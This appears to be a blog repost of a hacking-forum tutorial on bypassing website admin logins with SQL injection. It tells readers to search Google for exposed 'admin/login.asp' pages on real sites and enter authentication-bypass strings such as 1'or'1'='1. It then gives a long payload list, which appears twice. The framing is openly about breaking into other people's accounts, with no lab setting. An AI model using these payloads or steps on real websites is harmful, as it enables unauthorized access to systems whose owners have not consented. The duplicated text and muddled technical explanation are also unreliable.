4:51 AM
![[Image: star.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tjczp13KbTyJ2x53BkBTPgWzXHE-1Bku7vrIhADqsWhB_9mZmhwN3ZTn-FQf94BYdS0_C1czqcMKSukw4F2oaSO9hN5GsZYe5uwHrX08EKa0HjDMW8=s0-d)
![[Image: ub3rstar.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_QcMFqxJVJMnnnhXELIVay2xmll2ngVahzkSBdP7HDEKhNCNe5o4kcITeYL0jic0O2F2DPdj6BG8ZFAx6kQBV0XrFqtM-DRKXvhIhS-4KbuKrJqUNAKfRjQ=s0-d)
Basic SQL Injection Attack
For those people who just don't like to read much. I come straight to the point. 
We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
![[Image: GkatiJB.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vEykBurbeHSiKyq1Ijsz8emieBfH2sXQkc27QB_MCkWER1YQYzBvdhDIUMO4vD5ixBRikT-xBJDgiTU6-09PQqyg=s0-d)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
![[Image: Vl05pX5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQ_fkfcNdPTR3_G0eWwXmYGaUgVbQf7dUtNWsiAvprRcWFki_FEu-FY2mQsInSv3k0-OMzEh58zBUKf-AfO2efZw=s0-d)
Well done!! Your now logged in as ADMIN:
![[Image: kvv09kG.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t-lcx6maswGZKUEVT0MTi-OsxQ60Gf_62Q-ichFTYhwS7pkBSccOtNTTYxsO2sYSiXAxCYq1wGW1nLp5bpVrUjzg=s0-d)
![[Image: Heq2Tgg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sNOQLTG3koY_EDtH-RLOb51CFiJSpxr9WhBuI8WGxTzQDex_h0spp2xpdud8znDR8qY9FrKfiU5u2l3aeBpJRPJA=s0-d)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
Spoiler (Click to Hide)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
Spoiler (Click to Hide)
Well done!! Your now logged in as ADMIN:
Spoiler (Click to Hide)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
Spoiler (Click to Hide)
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Note: Websites that record false logins, this is not gonna work on.
I made it simple as it is guys, no long story's.
Post below, for any questions/suggestions/feedback and enjoy!
Post below, for any questions/suggestions/feedback and enjoy!
0 comments:
Post a Comment